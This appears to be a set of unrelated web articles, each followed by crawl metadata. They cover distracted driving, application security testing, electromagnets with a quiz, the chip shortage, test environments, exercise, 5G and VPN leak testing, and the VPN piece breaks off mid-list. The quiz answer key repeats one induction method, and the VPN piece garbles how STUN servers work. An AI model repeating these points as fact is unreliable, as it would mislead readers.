Distracted driving increased in each state, but Virginia was the “most distracted” on the list. Residents there spend an average of 9.45 percent of their time behind the wheel on their phones. Montana (9.14 percent), New Hampshire (9), Georgia (8.69) and Mississippi (8.63) round out the top five. By contrast, the least distracted states are Pennsylvania (6.47 percent), New York (6.74), Oregon (6.83), South Carolina (6.89) and South Dakota (7.03).
The most commonly used apps while driving are music and phone apps, edging out social media and texting. State laws and municipal regulations that ban the use of handheld devices entirely while driving could help the problem, the report concludes.
“While 47 states (including the District of Columbia) ban text messaging, talking on a handheld phone while driving is only banned in 16 states nationwide,” it says. “Although texting laws are a huge step forward, immediate and aggressive action needs to be taken against handheld phone use. We believe enforcing handheld bans can make a positive impact on states across the board next year.” | <urn:uuid:57d4c9f0-d7f5-4f39-b263-d03fef8d3166> | CC-MAIN-2022-40 | https://www.nextgov.com/cxo-briefing/2019/04/phone-addicts-are-new-drunk-drivers-report-says/156291/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00088.warc.gz | en | 0.966632 | 823 | 2.609375 | 3 |
Two powerful yet relatively new technologies in application security testing are Interactive Application Security Testing (IAST), and Software Composition Analysis (SCA). IAST solutions are designed to help organizations identify and manage security risks associated with vulnerabilities discovered in running web applications using dynamic testing (aka runtime testing) techniques.
SCA, a term coined by market analysts, describes an automated process to identify open source components in a codebase. Once a component is identified it becomes possible to map that component to known security disclosures and determine whether multiple versions are present within an application. SCA also helps identify whether the age of the component might present maintenance issues. While not strictly a security consideration, SCA also facilitates legal compliance related to those open source components.
The Need for Integrated IAST and SCA
According to the 2018 Verizon Data Breach Investigations Report (opens in new tab), web application attacks still remain the most common vector for data breaches. Web applications are the attack surface of choice for hackers attempting to get access to sensitive IP/data and personal data, such as usernames and passwords, credit card numbers, and patient information. Organizations need to ensure that the web applications they develop are secure, ideally before they are deployed in production, and developers need to be able to perform quick fixes when critical vulnerabilities are discovered.
Web applications are seldom composed exclusively of proprietary code. In fact, the converse is usually true, with open source code components ubiquitous in both commercial and internal applications. The 2018 Open Source Security and Risk Analysis (opens in new tab) (OSSRA) report published by the Synopsys Center for Open Source Research & Innovation found open source components in 96% of 1,100 applications scanned, with an average 257 components per application. Because organizations are often unaware of how much—or even what—open source they’re using, they can inadvertently provide attackers with a target-rich environment when vulnerabilities in open source components are disclosed. Seventy-eight percent of the codebases examined for the OSSRA report contained at least one open source vulnerability, with an average 64 vulnerabilities per codebase.
While development and security teams often use SAST (static application security testing) and SCA solutions to identify security weaknesses and vulnerabilities in their web applications, detection of many vulnerabilities is only possible by dynamically testing the running application, which led to the development of dynamic application security testing (DAST) tools. Despite similarities to traditional DAST and penetration testing tools, IAST is superior to both in finding vulnerabilities earlier in the SDLC—when it is easier, faster, and cheaper to fix them. Over time, IAST is likely to displace DAST usage for two reasons: IAST provides significant advantages by returning vulnerability information and remediation guidance rapidly and early in the SDLC, and it can be integrated more easily into CI/CD and DevOps workflows.
Shifting Left in the SDLC
IAST generally takes place during the test/QA stage of the software development life cycle (SDLC). With IAST effectively shifting testing left, problems can be caught earlier in the development cycle, reducing remediation costs and release delays. The latest-generation IAST tools return results as soon as changed code is recompiled and the running app retested. By focusing testing on a narrow set of changes, developers can quickly identify vulnerabilities even earlier in the development process.
IAST does analysis from within applications and has access to application code, runtime control and dataflow information, memory and stack trace information, network requests and responses, and libraries, frameworks, and other components (via integration with an SCA tool). The analysis allows developers to not only pinpoint the source of an identified vulnerability but also to address it quickly.
What to Look for in an IAST tool
IAST tools are dependent upon their ability to instrument code, which means their capabilities are dependent upon the application’s programming language. You’ll want to select an IAST tool that can perform code reviews of applications written in the programming languages you use and that is compatible with the underlying framework used by your software. Obviously, it should deploy quickly and easily, with seamless integration into CI/CD workflows. Compatibility with any type of test method—existing automation tests, manual QA/dev tests, automated web crawlers, unit testing, etc. is another feature to look for.
The best IAST tools provide DevOps teams with the ability to both identify security vulnerabilities and also inform as to whether that vulnerability can be exploited. Any modern IAST tool should include web APIs that enable DevOps leads to integrate testing into continuous integration builds like those using Jenkins. Native integration with defect management tools like Atlassian Jira provides for streamlined defect management workflow.
With the prevalence of open source code in today’s software, effective IAST tools need to be aware of the open source composition of the applications being tested. Open source compositional analysis is the responsibility of an SCA tool. This requires the SCA tool to have a deep understanding of open source development paradigms and produce a comprehensive inventory for the open source dependencies regardless of how the dependency is linked into the application.
Understanding whether an open source vulnerability is exploitable within a given application requires an understanding of whether the vulnerable component is present, how an exploit of the vulnerability operates, and an understanding of how the application uses the component. Only a combination of top-tier IAST and SCA tools can effectively identify this class of software risk and guide developers to resolution. An integrated IAST and SCA solution helps development teams build more secure software, minimize risks while maximizing their speed and productivity, and improve the quality of their software.
Tim Mackey, Technical Evangelist at Synopsys (opens in new tab)
Image Credit: Niroworld / Shutterstock | <urn:uuid:4647bc13-d383-4b6a-9f37-b20b8c685cb9> | CC-MAIN-2022-40 | https://www.itproportal.com/features/the-intersection-between-iast-and-sca-and-why-you-need-both-in-your-security-toolkit/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00088.warc.gz | en | 0.914234 | 1,177 | 2.59375 | 3 |
Electromagnets can be made much more powerful than permanent magnets. In addition, the strength of the electromagnet can be easily controlled from zero to maximum by controlling the current flowing through the coil. For these reasons, electromagnets have many more practical applications than do permanent magnets.
One of the most graphic examples of a working electromagnet is the one for cranes that are used to move scrap iron. The crane electromagnet shown in Figure 1 is a big block of soft iron that is magnetized by an electric current flowing through a coil.
This type of electromagnet has the capability of lifting heavy loads of magnetic scrap metal. Lift-and-drop control is easily accomplished by the connection and disconnection of voltage to the electromagnet.
Figure 1 Crane electromagnet.
A solenoid is an electromagnet with a movable iron core or plunger. Upon applying power or energizing the coil, the magnetic field that is produced pulls or pushes the plunger into the coil, as illustrated in Figure 2.
Whenever power is applied to the coil, the plunger is magnetically attracted into the stator as it slides along a nylon surface in a linear fashion. By attaching a nonferrous push rod to the plunger, a pushing or pulling motion can be accomplished.
Figure 2 Solenoid.
Solenoid valves are the most frequently used device to control liquid or gas flow. A solenoid valve has two main parts: the solenoid and the valve. Figure 3 shows a typical solenoid valve. One inlet and one outlet are used to permit and shut off fluid flow. A spring is used to hold the valve closed when the solenoid coil is de-energized. When the coil is energized, the magnetic field created pulls the plunger upward to open the valve, permitting liquid flow from inlet to outlet.
Figure 3 Solenoid valve.
Most home heating/cooling system’s thermostats operate on low-voltage (typically 24 volts AC) control circuits. The source of the 24-volt AC power is a control transformer installed as part of the heating/cooling equipment.
The advantage of the low-voltage control system is the ability to operate system load devices using inherently safe voltage and current levels.
Transformers are electrical devices that are used to raise or lower AC voltages. Figure 4 is a typical step-down control transformer. The transformer uses two electromagnetic coils to transform or change the AC input voltage level.
An input voltage of 120 VAC is applied to the primary coil wound around an iron core. An output voltage of 24 VAC emerges from a secondary coil also wound around the core.
The AC voltage input current produces a magnetic field that continually varies in magnitude. The core transfers this field to the secondary coil where it induces an output voltage. The change in voltage depends on the ratio of turns in the primary and secondary coils.
Figure 4 Step-down control transformer.
Electricity is generated at a comparatively low voltage. In order to transport this energy great distances, the voltage has to be increased, or stepped up, to values as high as 765,000 volts. This is accomplished through the use of large step-up transformers located near the generating station and provides an efficient and economical method of transmission. A series of transformers then step-down the voltage to levels that are safe in businesses and residences.
An electromagnetic control relay is a switch that is operated by an electromagnet. The relay generates electromagnetic force when input voltage is applied to the coil. The electromagnetic force moves the armature that switches the contacts.
A relay is made up of two circuits: the coil input or control circuit and the contact output or load circuit, as illustrated in Figure 5. Relays are used to control small loads of 15 A or less, which include solenoids, pilot lights, alarms, and small fan motors.
Figure 5 Electromagnetic control relay.
An electric generator is a machine that uses magnetism to convert mechanical energy into electric energy. Generators can be subdivided into two major categories depending on whether the electric current produced is alternating current (AC) or direct current (DC).
The basic principle on which both types of generator work is the same, although the details of construction of the two may differ somewhat.
The generator principle states that a voltage is induced in a conductor whenever the conductor is moved through a magnetic field so as to cut lines of force. Figure 6 illustrates the generator principle and relationships between the direction the conductor is moving, the direction of the magnetic field, and the resultant direction of the induced current flow.
Figure 6 Generator principle.
In its basic form the AC generator consists of a magnetic field, an armature, slip rings, and brushes. For most applications the magnetic field is created by an electromagnet, but for the simple generator shown in Figure 7, permanent magnets are used.
The armature is rotated through the magnetic field and may contain any number of conductors wound in loops. As the armature is rotated, a voltage is generated in the single loop conductor which causes current to flow. Slip rings are attached to the armature and rotate with it. Carbon brushes ride against the slip rings and conduct the current from the armature to the output load.
Figure 7 Basic AC generator.
As the armature is rotated through one complete revolution, an AC sine wave voltage is produced, as illustrated in Figure 8. This generated voltage varies in both voltage value and polarity as follows:
- At 0 degrees the coil is moving parallel to the magnetic field. It cuts no lines of force, so no voltage is generated.
- When the coil rotates from 0 to 90 degrees, it cuts more and more lines of flux. As the lines of flux are cut, voltage is generated in the positive direction and reaches a maximum value at 90 degrees.
- As the coil continues to rotate from 90 to 180 degrees, it cuts fewer and fewer lines of flux. Therefore, the voltage generated goes from maximum back to zero.
- When the coil continues to rotate past 180 to 270 degrees, each side of the coils moves through the magnetic field in the opposite direction. More and more lines of flux are cut, and a voltage is generated in the negative direction and reaches a maximum value at 270 degrees
- As the coil continues to rotate from 270 to 360 degrees, it cuts fewer and fewer lines of flux. Therefore, the voltage generated goes from maximum back to zero.
Figure 8 Generation of an AC sine wave voltage.
Electric motors are used to convert electric energy into mechanical energy. Motors use magnetism and electric currents to operate. There are two basic categories of motors, AC (Figure 9) and DC. Both use the same fundamental parts but with variations to allow them to operate from two different kinds of electric power supply, alternating current or direct current.
Figure 9 AC electric motor.
The operation of an electric motor depends upon the interaction of two magnetic fields. Whenever a conductor carrying current is placed in a magnetic field, it will experience a force which tends to push it out of the magnetic field. The right-hand rule for motors (Figure 10) indicates the direction that a current-carrying conductor will be moved in a magnetic field.
When the forefinger is pointed in the direction of the magnetic lines of force, and the center finger in the direction of the current flow in the conductor, the thumb will point in the direction that the conductor will move.
Figure 10 Current-carrying conductor in a magnetic field.
If the conductor is bent in the form of a loop, current flows in one direction on one side of the loop and in the opposite direction on the other. As a result the two sides of the coil experience forces in opposite directions, as illustrated in Figure 11. The pair of forces with equal magnitude but acting in opposite directions causes the loop to rotate around its axis, developing motor torque.
The overall turning force on the armature loop depends on several factors, including field strength and the amount of current flow through the loop. In the practical motor, if the motor does not develop enough torque to pull its load, it stalls.
Figure 11 Developing motor torque.
- List two advantages that electromagnets have over permanent magnets for many practical applications.
- Explain how the lift-and-drop control of a crane-operated lifting magnet is accomplished.
- Explain how solenoids operate.
- Explain how solenoid valves operate.
- In the operation of a transformer, what determines the change in voltage between the primary and secondary coils?
- Explain how an electromagnetic control relay operates.
- State the principle of operation of a generator.
- In the operation of an AC generator the output voltage varies in both voltage value and polarity.
- What causes the output voltage to vary in value?
- What causes the output voltage to vary in polarity?
- Compare the function of electric generators and motors.
- What is the basis for the operation of an electric motor?
- Describe the two methods used to create electromagnetic induction.
- When does mutual inductance between two coils occur?
- Which side of a transformer is designated as the primary and what side as the secondary?
- Electromagnets can be made much more powerful and the strength of the electromagnet can be easily controlled.
- By connection and disconnection of voltage to an electromagnet.
- Applying power to the coil produces a magnetic field that pulls or pushes the plunger into the coil.
- When the coil is energized the magnetic field created pulls the plunger upwards to open the valve permitting liquid flow from inlet to outlet. When the solenoid coil is de-energized a spring closes the valve.
- The ratio of the turns in the primary and secondary coils.
- The relay generates electromagnetic force when input voltage is applied to the coil. The electromagnetic force moves the armature that switches the contacts.
- The generator principle states that: a voltage is induced in a conductor whenever the conductor is moved through a magnetic field so as to cut lines of force.
- (a) The value of the output voltage varies in an AC generator based on the number of lines of flux that are being cut. (b) The output voltage polarity changes when direction of the coils relative to the direction of the magnetic field changes.
- An electric generator is a machine that uses magnetism to convert mechanical energy into electrical energy. Electric motors are used to convert electric energy into mechanical energy.
- Whenever a conductor carrying current is placed in a magnetic field, it will experience a force which tends to push it out of the magnetic field.
- By motion of a conductor across a magnetic field AND By motion of a conductor across a magnetic field.
- When the two coils are magnetically linked together by a common magnetic flux.
- The primary is the side connected to the AC power input and the secondary is the side connected to the output. | <urn:uuid:0993624d-25ae-4e6b-b117-3a9d375537b3> | CC-MAIN-2022-40 | https://electricala2z.com/electrical-circuits/uses-for-electromagnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00088.warc.gz | en | 0.909828 | 2,312 | 3.734375 | 4 |
The global shortage of microchips is severely impacting the automotive market with no fast or easy resolution within sight. While this supply chain disruption has evoked the attention of world leaders, legislators, and industry experts, the problem persists. Simply put, there aren’t enough chips to meet demand. Some short-term tactics may help contain losses for stakeholders, but most lessons learned require long-term changes in strategy and supply chain planning. Fortunately, putting advanced technology in place can help significantly mitigate the impact of similar supply chain disruptions in the future.
How bad is the current chip shortage?
As cars have almost literally become smartphones on wheels, semiconductors have become increasingly critical for a variety of applications, from fuel-pressure sensors, to digital speedometers and artificial intelligence-driven tools that assist with parking, finding the next fuel station, or alerting the driver when an oil change is needed. Without these tiny silicon wafers, the auto industry’s post-pandemic recovery has stalled, as manufacturers are unable to complete orders. By some estimates, the impact on global production volumes is expected to be about 7-to-8 million units, and McKinsey reports that major carmakers have already announced significant rollbacks in their production due to chip shortages, lowering expected revenue for 2021 by billions of dollars.
Where did all the chips go?
The trouble began in the early months of the COVID-19 pandemic, when auto sales plummeted as much as 80% in Europe, 70% in China and nearly 50% in the U.S. The lack of demand for new cars caused factories to close, workers to be sent home and orders for parts and components – such as semiconductors – to be cancelled. This may have been shortsighted. Tech Republic reports that when automotive OEMs shut down, cancelling orders, they left disgruntled chip suppliers holding inventory and excess capacity. At the same time, some sectors needed more semiconductors to meet exploding demand from housebound consumers and remote workers. Sales spiked for PCs, tablets and consumer electronics, as students and workers set up workstations at home and people consumed more streaming media. Those manufacturers were happy to snap up the chip inventory. Now, they aren’t letting go.
Who is hurt by the chip shortage?
The impact is far reaching, beyond just frustrated car shoppers. When factories close, jobs are lost, crippling the economy. Industry Week reports on the political ramifications, saying, “The chip shortage due to manufacturing snags has had a massive impact on the U.S. economy, hindering auto production and driving prices higher.” The White House has held meetings with U.S. semiconductor industry executives and European leaders to try to ease the current chip crunch and work on longer term solutions.
Changes are being put into action. UK’s Fleetnews says, “The sector is clearly navigating through a period of disruption. Overall, given the chip shortage, automakers are increasingly compelled to learn from the current situation to adapt and tackle the future in a more efficient manner.”
Some OEMs are taking matters into their own hands, trying to develop their own microprocessors and even software. While this may mean more control, many experts consider this economically impractical, as automotive chips are typically low-value, commoditized items. Investing in building foundries, a high-cost endeavor, would take decades to break even.
An exception is Tesla, reports Industry Week. It has designed the microchip for its Full Self-Drive system, producing the chip too. The investment may be paying off. In the second quarter, the carmaker delivered a record number of vehicles and topped $1 billion of net profit for the first time.
The European Union wants to get into the chip business
It was recently announced that the European Union is planning to address the issue through legislation, hoping to create “tech sovereignty” in the face of the ongoing shortage.
“Digital is the make-or-break issue,” EU chief Ursula von der Leyen told the European Parliament in her annual State of the European Union address. EU countries plan to spend collectively more than 160 billion euros ($190 billion) to boost that sector in coming years – some 20% of the bloc’s 800-billion-euro COVID recovery fund.
The EU wants to be the source of 20% of the world’s semiconductor production by the end of the decade, according to a roadmap presented in March by the European Commission.
What can be done for short-term relief of the chip shortage?
Gartner suggests that automotive companies remain vigilant, continuing to negotiate with chip suppliers. “Since the current chip shortage is a dynamic situation, it is essential to understand how it changes on a continuous basis. Tracking leading indicators, such as capital investments, inventory indices and semiconductor industry revenue growth projections as an early indicator of inventory situations, can help organizations stay updated on the issue and see how the overall industry is growing,” said Gaurav Gupta, research vice president at Gartner.
How can we respond to the chip shortage in the longer term?
Technology can help overcome the complex challenges:
Data Insights. Manufacturers can look to technology to help them leverage data and make sense of the economic indicators. Analytics will be an important weapon in this battle but must be applied strategically – projecting likely outcomes, as well as understanding historical influences.
Extend supply chain visibility. The importance of supply chain visibility is crystal clear. And visibility must extend beyond just tier one suppliers, all the way down through the layers of the entire supply network. Using secondary options, though, such as small cargo ships, adds some reliability concerns, complicating issues in another front. This is likely to be a long-term effort with some trial and error. Drilling down into this detail is the only way to obtain a true picture of potential bottlenecks and risks.
Maintain supply chain flexibility and mitigate risk. It isn’t enough to observe potential trouble spots. Companies must also be able to take action, reassigning orders or re-mapping shipping routes, as needed, to keep inventory moving, routed to the most optimal location. Platforms that link trading partners via common processes and shared data can provide enhanced sense-and-respond capabilities, thereby significantly reducing risk.
Collaborative innovation. Changing product design specifications may be able to help ease some inventory gaps. Procuring consumer-grade chips with more capacity (and higher costs) may turn lower priority automotive accounts into ones that receive more attention from semiconductor producers.
Infor customer SEG Automotive turns to technology to manage complexity
Some tech-savvy companies are already applying technology to improve a wide variety of operational objectives, including supply chain planning. Global automotive supplier SEG Automotive, for example, relies on Infor CloudSuite Automotive to address today’s many market challenges. As a leading global supplier of drive components, SEG Automotive is in the center of today’s fast-changing trends. Infor’s multi-tenant cloud platform helps SEG respond with speed and agility. As cars have become more high-tech, SEG Automotive has kept pace, also taking advantage of sensors and AI technology in its product design and earning recognition as a technological pioneer. This transformation requires lean processes that support innovation and product development.
We can improve not only our workflow management but also utilize modern methods in digital manufacturing and machine learning,” says Tim Zimmermann, ERP Director, SEG Automotive. “This allows us to raise both production optimization and automated monitoring of our production to a new level.
SEG Automotive has launched several Industry 4.0 technologies to optimize the use of data, connectivity, and robotics. CloudSuite Automotive supports these modern processes. The solution enables the standardization of digital business processes, improves end-to-end visibility, and helps the organization apply integrated business planning and AI-driven business insights, especially important during this semiconductor shortage.
Digital networking with all business partners and the provision of data in a centralized data lake will lead to faster and more efficient decision-making and easier reporting in the future. A central view of all company data means that industry 4.0 and machine learning initiatives can be implemented strategically.
SEG Automotive is an example of an enterprise that is putting technology in place to help it address modern complexity. As the chip shortage – and other challenges – unfold, SEG Automotive and other manufacturers using advanced cloud solutions will be better equipped to respond with agility and intelligence. Modern tools won’t solve all supply chain challenges, but they have proven to put companies in a better position moving forward. | <urn:uuid:45e6a25e-2571-4d50-b9cf-3b3745581da4> | CC-MAIN-2022-40 | https://diginomica.com/global-microchip-shortage-automotive-industry-reinforces-need-better-supply-chain-planning | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00088.warc.gz | en | 0.941287 | 1,796 | 2.796875 | 3 |
A software testing environment allows developers and quality assurance teams to evaluate new or updated software in configured environments that test specific application components. Testing environments are similar but different from staging environments. However, both are considered under the umbrella of environment testing.
Developers identify issues or vulnerabilities during environment testing before deployment to the live environment. The environments used refine the final product before deployment and help ensure the launch or update’s success, which can impact the organization.
What is Environment Testing?
Developers can spin up a new environment on-demand to evaluate an application, either before it’s launched or before an update is deployed.
This process creates new sandbox environments unaffected by other developers’ tests and disconnected from the live environment. Sandbox environment testing has become increasingly popular as apps and systems rely on dependencies and third-party services, such as AWS or Azure. These dependencies can be included in environment testing.
Test environments are configured based on the needs of the application being tested, specifically the needs of its components. For example, suppose a developer is testing a web app. In that case, the test environment will mimic the same tech stack used by the live environment, including server-side and front-end technologies.
Testing Environments vs. Staging Environments
It’s common to have both a testing environment and a staging environment; at first glance, they seem the same. However, they’re both necessary and have important differences.
A sandbox for testing is configured based on the needs of the components or code being tested. This can often imitate the live environment, but the configuration can also vary based on the component’s needs.
A staging environment replicates the application’s current or future live environment precisely. While a testing environment tests specific code or components, a staging environment tests the whole application from end-to-end.
The Importance of Environment Testing
Environment testing aims to uncover bugs, vulnerabilities, or performance issues before the application is fully deployed. Additionally, they allow for incremental testing to identify problems before further development takes place.
It’s vital to test applications rigorously before deployment to uncover any issues that can significantly impact the business.
Essential Components of a Test Environment
Configuring a test environment involves several key components. These components include:
- The front-end environment
- The database server
- The operating system, including server operating systems
- A browser
- Networking software (and potentially hardware)
- Test data
- Documentation, user manuals, installation guides
- The system or application being tested
Including each of these components and setting them up properly is crucial to the environment’s functionality. For example, failing to configure the database server properly can waste time testing the app when the issue is actually with the environment itself.
A common challenge of both testing and staging environments is the resources they consume. They can unnecessarily use network and system resources when improperly configured or left up when no longer needed. As a result, companies have started to turn to companies that offer test environment as a service to help address this challenge and better utilize company resources.
Benefits of an Automated Testing Environment
Testing environments can embrace automation to streamline the entire process and eliminate the possibility of a developer misconfiguring one of the components. An automated testing environment is configured once by an engineer or developer, and is then available to spin up on-demand by anyone who needs it.
Automated test environments will always be deployed exactly the same, regardless of who deploys them or when they’re used. Additionally, multiple testing environments can be preconfigured to test different applications or different components of an application.
Leveraging a third-party platform with pre-built testing templates that you can modify to fit your needs can significantly reduce the time and resources necessary to create these vital testing areas. All making it easy for developers to deploy as needed and test components or applications to prevent issues from being included in the live version. | <urn:uuid:06f44247-52f8-4f03-9122-ca4a7edb5d17> | CC-MAIN-2022-40 | https://www.cloudshare.com/virtual-it-labs-glossary/environment-testing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00088.warc.gz | en | 0.92805 | 817 | 2.953125 | 3 |
A new research suggests a single time of physical exercise can make us feel stronger, thinner, and happier.
According to 2013 reports only 11 percent of adult U.S. women over the age of 45 are satisfied with the appearance of their body. Body image dissatisfaction is a major risk factor for eating disorders and other types of unhealthy behavior.
Body image dissatisfaction is mainly affecting women. But, some studies shown that “normative discontent” it means people are not happy with their bodies look like a result of societal beauty norms affects both men and women to a comparable extent.
30 minutes of exercise
Kathleen Martin Ginis, a professor at UBC, Okanagan compared the physical self-perceptions and body images of women who exercised moderately for 30 minutes. Research on 60 young women with an average age19 years, who already had body image concerns and engaged in physical activity regularly.
The women randomly assigned to do either 30 minutes of moderate-to-vigorous exercise, or engage in quiet reading while sitting.
The researchers evaluated the women’s state body image, which is how one feels about one’s body at a specific moment in time.
The women who worked out improved their body image significantly, compared with those who did not exercise. The effect almost immediatly and lasted for a minimum of 20 minutes after exercise.
The affect and physical self-efficacy did not change significantly. Instead, it was the self-perceptions of body fat and strength that improved considerably after the exercise.
Prof. Ginis emphasizes that exercise interventions are an effective way to boost psychological well-being.
The study shows one way to feel better is to get going and exercise. The effects can be immediate.
More information: [ScienceDirect] | <urn:uuid:e148e073-5871-4b51-837c-f0365abf161e> | CC-MAIN-2022-40 | https://areflect.com/2017/06/19/research-suggests-physical-exercise-makes-women-feel-stronger-and-thinner/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00288.warc.gz | en | 0.948659 | 367 | 2.765625 | 3 |
By Steve McCaskill
The GSMA says it wants to “reset” the discussion surrounding 5G development and how such networks should be defined, but says there is plenty of life left in 4G, which is providing a boost to European mobile operators and the wider economy.
A number of different projects around the world are working on the development of 5G networks, including the 5G Innovation Centre (5GIC) at the University of Surrey, but many different technologies have been labeled “5G,” creating confusion.
The GSMA, which represents the mobile industry, hopes its intervention will influence development and the standardization of the technology, so potential applications can be identified and regulatory frameworks, such as spectrum allocation, can be formulated.
5G ‘Day Zero’
“Already being widely discussed, the arrival of 5G will help deliver a fresh wave of mobile innovation that will further transform the lives of individuals, businesses and societies around the world,” says Anne Bouverot, Director General, GSMA. “Of course, 5G is still to be standardized by the industry and it has not been fully agreed what 5G will look like or what it will enable.
“However, the GSMA is already collaborating with operators, vendors, governments and other industry organizations in ensuring that the future 5G standard is both technically and economically viable.”
Its report Understanding 5G: Perspectives on Future Technological Advancements in Mobile identifies two competing definitions of 5G—the “hyper-connected vision” view and the “next generation radio access technology” definition.
The first definition describes 5G as a combination of existing cellular and wireless technology to improve coverage and availability through the creation of a dense network that can support M2M. The GSMA says this is more of an evolution of existing technology whereas the second perspective outlined is more representative of a true generational shift with specific technical features.
Both definitions identify eight core technical requirements—speed, latency, network densification, coverage, availability, operational expenditure reduction and field life of devices—but in the GSMA’s eyes only the first two relate to a true generational shift as the others are economic considerations or can be applied to other types of wireless technology.
The 5GIC claims the true defining feature of 5G will not be speed, although it says 800Gbps in an extremely dense network environment is possible, but the impression of “infinite capacity.” The GSMA expects 5G networks to offer at least speeds of 1Gbps and sub-1 millisecond latency and only applications that require at least one of those features can be considered a true use case.
These include virtual reality or augmented reality gaming, wearable and health apps, connected cars and wireless cloud office applications, but many more potential apps have not yet been identified and will only become apparent as 5G nears commercialization.
“Our new report aims to reset the discussion on 5G, drawing the distinction between a true generational shift versus the on-going evolution of existing technologies that are already delivering a next-generation mobile experience,” adds Bouverot. “The GSMA will support the industry to continue to innovate and grow, working in close collaboration with our members, the wider mobile ecosystem, governments and other industry organizations to deliver a digital future for all.”
However, the GSMA says mobile operators immediate focus will be on the ongoing rollout of 4G, predicting that $1.7 trillion will be spent on network investment by 2020—most of it on 4G. Just five percent of all mobile connections are LTE at present, but this is expected to increase dramatically. Indeed, the GSMA recently told TechWeekEurope about its efforts to secure more spectrum for 3G and 4G services in a bid to support the world’s growing appetite for data.
This rollout is already having an impact on Europe and 4G will account for half of all connections on the continent by the end of the decade. The GSMA says will help mobile operators suffering from competitive, highly regulated and economically sensitive markets and slowing revenues from legacy services.
The GSMA says it wants to work with the new European Parliament to improve the environment for operators even further, arguing that 4G deployments are aiding the economy. The body says the mobile industry contributed 3.1 percent of Europe’s GDP in 2013, equivalent to €433 billion and is expected to reach €492 billion in total economic value by 2020.
“There are encouraging signs that Europe’s mobile industry is beginning to recover as both operators and consumers begin to see the benefit from the billions of euros of investment in 4G networks over the last few years,” continued Bouverot.
“Ongoing investment in networks and services, and particularly extending network coverage, will be vital in supporting Europe’s economic recovery and in delivering the world-class connectivity needed to prosper in an increasingly digital global economy. Europe’s operators must have the commercial freedom to develop new business models, innovate at the network and service levels, and offer customized services that can attract investment and drive innovation and competition in the global marketplace.” | <urn:uuid:e2d0b556-f03f-4e48-affb-bd084884bd13> | CC-MAIN-2022-40 | https://www.eweek.com/networking/gsma-5g-will-be-at-least-1g-bps-and-offer-low-latency/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00288.warc.gz | en | 0.929622 | 1,078 | 2.609375 | 3 |
VPNs have become much more popular as a way for people to keep their data secure in an increasingly insecure world. As the technology has grown in prevalence, a number of different types of VPNs have come to market, which has increased the chances of vulnerability.
If you are using a VPN, it’s important to check your VPN performance regularly by performing VPN leak tests.
Types of VPN Leaks
DNS acts as a connector between the internet and a user. When a user enters any URL into the browser, the browser immediately communicates the user’s device DNS and asks for the IP address of that site or webpage. Without a DNS server, the searched webpage can’t be displayed to the user.
The DNS server keeps the IP addresses of websites and provides it to the browser, as the internet is not capable of processing the wordy URL.
ISP DNS is the default setting in most devices, and through this channel, your ISP can know all the browsing activities. DNS leaks occur when a user connects to a VPN to hide their browsing history. Normally, the VPN automatically changes the ISP DNS to the anonymous VPN DNS. In a DNS leak, however, the DNS request bypasses the VPN and goes to ISP DNS.
An IP leak occurs when a user’s real IP address is exposed when a VPN is connected to hide it. There could be many reasons for IP leaks, including vulnerabilities in operating systems, browser plugins or web browsing software.
Torrent IP leak
As implied by the name, this leak occurs while torrenting. The torrent activities are also anonymized and encrypted when a user is connected to a VPN. Sometimes, however, the torrent client unveils the user’s real IP address. A torrent IP leak only occurs while torrenting, due to setting issues such as the enabled DHT and PEX features or the split tunneling feature of the VPN.
When split tunneling is enabled, some of the internet traffic—including the torrent traffic— is unencrypted, exposing the IP address.
WebRTC, or web real-time communication, is a feature in many browsers that provides browser-to-browser real-time communication, video and voice calling, P2P file sharing and other tasks without the need of any third-party software.
With a little effort, WebRTC can be used to reveal the user’s real IP when the VPN is connected. WebRTC communications occur through the internet-based server known as STUN (Session Traversal Utilities for NAT). With the help of the STUN server, your computer and other internal network devices can find their public IP addresses. STUN servers are also used by a VPN service to translate the internal network address to the public IP address and vice versa. To carry out this process, the STUN server keeps a database of VPN-based IP address and the local IP address while connected.
WebRTC leak is not an issue with the VPN. Rather, it is the vulnerability of the browser. When the STUN server queries are accepted by a browser’s WebRTC, the response is sent back to the STUN server. This response reflects both the public and private IP address and other information.
How to Avoid VPN Data Leaks
You can easily get rid of these privacy vulnerabilities by following some privacy measures. But before that, you need to determine whether your VPN working. There are some tests through which you can spot a leak or vulnerability in your VPN.
Detecting VPN Leaks
First, disconnect your VPN, go to Google and enter “What is my IP.” You will get your real IP address in the search result, and you should remember your IP so that you can analyze your VPN performance. Now, you must check every data leak individually.
DNS Leak Test
To perform a DNS leak test, you should use a legitimate DNS test tool that is not affiliated with a VPN or doesn’t have its own VPN service. Such tools could mislead you with confusing results.
- Connect your VPN and go to the DNS test tool.
- Run the test and wait for the results.
- Now, analyze the results. If the DNS results match your real IP details, then your VPN might be leaking DNS.
If you find the DNS leak, there are two ways to fix it.
- You can manually change your DNS settings form ISP DNS to any third-party DNS server. GoogleDNS and OpenDNS are the two popular DNS servers.
- Use a VPN with a DNS leak prevention feature. This feature continuously monitors the DNS requests and prevent DNS leak.
Torrent IP Test
- Open any torrent test tool.
- Click “Load Torrent File.”
- Then click “Magnet Link” and open the file in your torrent client. (If you don’t have any torrent file, then download one before testing torrent IP leak).
- When the downloading starts, check the test page to see which IP is displayed in the right-side box.
- Analyze the results. If the IPs are the same, then your torrent IP is not revealing your real IP.
There are three ways to prevent torrent IP leak:
- Use a VPN with kill switch feature. This feature is specially designed for torrenters to prevent IP leaks should the VPN connection drop.
- Bind IP with your torrent client. You can find the IP binding method by searching the name of your torrent client.
- Some third-party software such as VPNWatcher, VPNCheck or VPNNetMon can work as a kill switch by automatically disconnecting the internet when the VPN connection is disconnected.
- Open any WebRTC test tool.
- Click “Execute Test” and wait for the results.
